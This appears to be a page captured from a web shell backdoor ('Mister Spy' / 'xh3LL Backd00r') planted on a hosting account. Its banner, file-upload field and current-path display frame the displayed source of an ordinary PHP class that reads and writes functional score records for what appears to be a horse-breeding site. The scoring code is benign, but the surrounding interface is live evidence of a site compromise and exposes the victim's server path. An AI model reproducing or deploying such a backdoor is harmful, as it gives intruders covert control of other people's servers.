Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/library/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/library/class.puntajesfuncionales.php

<?php 

require_once('class.dbaccess.php');
require_once('class.puntajefuncional.php');
require_once('class.filter.php');
require_once('class.page.php');

class PuntajesFuncionales extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		return $sql;
	}


	public function GetPagesCount(Page $oPage, array $filter = NULL)
	{	
		$Count = $this->GetCountRows($filter);

		$Count = $Count / $oPage->Size;
		
		return ceil($Count);
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPuntajesFuncionales";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY IdPremio, IdCategoria, IdPruebaFuncional ASC";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oPuntajeFuncional = new PuntajeFuncional();
			$oPuntajeFuncional->ParseFromArray($oRow);
			
			array_push($arr, $oPuntajeFuncional);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}


	public function GetById($IdPuntaje)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPuntajesFuncionales";
		$sql.= " WHERE IdPuntaje = " . DB::Number($IdPuntaje);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oPuntajeFuncional = new PuntajeFuncional();
		$oPuntajeFuncional->ParseFromArray($oRow);
		
		return $oPuntajeFuncional;		
	}


	public function GetByKey($IdPremio, $IdCategoria, $IdPruebaFuncional, $final = false)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPuntajesFuncionales";
		$sql.= " WHERE IdPremio = " . DB::Number($IdPremio);	
		$sql.= " AND IdCategoria = " . DB::String($IdCategoria);	
		$sql.= " AND IdPruebaFuncional = " . DB::Number($IdPruebaFuncional);	
		if ($final)
			$sql.= " AND Final = '1'";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oPuntajeFuncional = new PuntajeFuncional();
		$oPuntajeFuncional->ParseFromArray($oRow);
		
		return $oPuntajeFuncional;		
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPuntajesFuncionales";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}


	public function Create(PuntajeFuncional $oPuntajeFuncional)
	{
		$arr = array
		(
			'IdPremio' 			=> DB::Number($oPuntajeFuncional->IdPremio),
			'IdCategoria' 		=> DB::String($oPuntajeFuncional->IdCategoria),
			'IdPruebaFuncional' => DB::Number($oPuntajeFuncional->IdPruebaFuncional),
			'Puntaje' 			=> DB::Number($oPuntajeFuncional->Puntaje),
			'Final'				=> DB::String($oPuntajeFuncional->Final)
		);
		
		if (!$this->Insert('tblPuntajesFuncionales', $arr))
			return false;
			
		$oPuntajeFuncional->IdPuntaje = DBAccess::GetLastInsertId();
			
		return $oPuntajeFuncional;
	}
	

	public function Update(PuntajeFuncional $oPuntajeFuncional)
	{
		$where = " IdPuntaje = " . DB::Number($oPuntajeFuncional->IdPuntaje);
		
		$arr = array
		(
			'Puntaje' => DB::Number($oPuntajeFuncional->Puntaje),
			'Final'				=> DB::String($oPuntajeFuncional->Final)
		);
		
		if (!DBAccess::Update('tblPuntajesFuncionales', $arr, $where))
			return false;
		
		return $oPuntajeFuncional;
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat